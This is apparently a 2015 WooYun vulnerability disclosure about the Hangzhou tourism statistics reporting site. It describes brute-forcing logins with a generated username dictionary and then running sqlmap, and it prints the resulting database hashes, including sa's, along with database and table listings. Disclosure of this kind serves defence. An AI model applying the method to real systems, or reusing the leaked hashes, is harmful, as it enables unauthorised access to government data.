当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102981

漏洞标题:杭州旅游统计上报系统/登录爆破/SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: Ztz

提交时间:2015-03-24 18:32

修复时间:2015-05-11 16:50

公开时间:2015-05-11 16:50

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向核心白帽子及相关领域专家公开
2015-04-16: 细节向普通白帽子公开
2015-04-26: 细节向实习白帽子公开
2015-05-11: 细节向公众公开

简要描述:

杭州旅游统计上报系统/登录爆破/SQL注入
分类选了设计缺陷,因为这网站能查询用户名,还不设验证码,这不找爆破么。

详细说明:

stat.gotohz.gov.cn

A.PNG


试了admin什么的,不能登录,有个用户查询,点进去以"杭州"为关键词查询。

B.PNG


这里看到,除了少数自己改过用户名的用户外,大多数用户是u+3位或4位数字组成。(999以下的位3位,如076 121 888,超过1000的为4位)

G.PNG


尝试cb模式爆破,由于登录系统不需要验证码,爆破起来非常方便。

E.PNG


这里我们使用burp自带的"内存字典".我们尝试爆破u000到u3000,把最小值设为0,最大值设为3000,步长为1,整数位最小3位,最大4位,小数位没有。这样就可以生成符合用户名规则的"用户名字典了"


这样做比runtime file的优势在于,runtime file方式下,burp会一次性将txt读到内存里,增加了不必要的内存开销,对硬盘有一个瞬间的峰值读取。相比而言,及时生成的"内存字典"对内存的需求不大,下一条需要的payload可以由上一条计算得来,这样虽然增加了cpu负载(实际影响微乎其微,因为仅仅是step这样的简单算术加运算),但对减少内存开销有重大作用。


F.PNG


言归正传,反正123456这种密码永远会有人用的,果然,爆破出一大堆。

C.PNG


登录一个看看,看来权限不高。能看看企业执照,入住信息啥的。上传下载处,没有真实地址返回。

D.PNG


登录以后系统SQL完全没防范,屁股都看光了。
上sqlmap跑一跑。

web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x010027de5f59d938cc93018e71bc8c8ff881b143be3702132718
        header: 0x0100
        salt: 27de5f59
        mixedcase: d938cc93018e71bc8c8ff881b143be3702132718
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x010003dea68b9152e330cd47e09eac77f992cba2a11c2c2f3c6f
        header: 0x0100
        salt: 03dea68b
        mixedcase: 9152e330cd47e09eac77f992cba2a11c2c2f3c6f
[*] sa [1]:
    password hash: 0x0100324b8ebe73bb08eb3d720bc76bb8564d02b930c1db820528
        header: 0x0100
        salt: 324b8ebe
        mixedcase: 73bb08eb3d720bc76bb8564d02b930c1db820528
[*] sms [1]:
    password hash: 0x01008b6f7745b58c01f56f6ad80c4eacceaf853be3cb49ee20ef
        header: 0x0100
        salt: 8b6f7745
        mixedcase: b58c01f56f6ad80c4eacceaf853be3cb49ee20ef


available databases [32]:
[*] hztour2009
[*] hztour2010
[*] hztour2011
[*] hztour2012
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] StatNotify
[*] tempdb
[*] tour1995
[*] tour1996
[*] tour1997
[*] tour1998
[*] tour1999
[*] tour2000
[*] tour2002
[*] tour2003
[*] tour2004
[*] tour2005
[*] tour2006
[*] tour2007
[*] tour2008
[*] tour2009
[*] tour2010
[*] tour2011
[*] tour2012
[*] tour2013
[*] tour2014
[*] tour2015
[*] tourtest


Database: tour2015
[59 tables]
+------------------+
| AreaGroup        |
| Area_T22         |
| Area_T23         |
| Area_T24         |
| Area_T251        |
| Area_T32         |
| Area_T33         |
| Area_T34         |
| Area_T42         |
| Area_T43         |
| Area_T62         |
| Area_t222        |
| Area_t223        |
| Area_t26         |
| DeleteUnit       |
| Hjz_Country      |
| Hjz_Hotel        |
| Hjz_Sight        |
| Hjz_Travel       |
| Hjz_UnitInfo     |
| InfoUnit_Country |
| LastDay          |
| ReportMonth      |
| T12              |
| T13              |
| T15              |
| T16              |
| T22              |
| T23              |
| T24              |
| T25              |
| T251             |
| T28              |
| T32              |
| T33              |
| T34              |
| T35              |
| T42              |
| T43              |
| T51              |
| T62              |
| T63              |
| UnitInfo         |
| YearAim          |
| areacode         |
| dtproperties     |
| hjz_Date         |
| t14              |
| t221             |
| t222             |
| t223             |
| t26              |
| t321             |
| t52              |
| userright        |
| v28              |
| v28_First        |
| v32              |
| v32withCountry   |

漏洞证明:

同上。

修复方案:

你们更专业。

版权声明:转载请注明来源 Ztz@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-27 16:48

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置.

最新状态:

暂无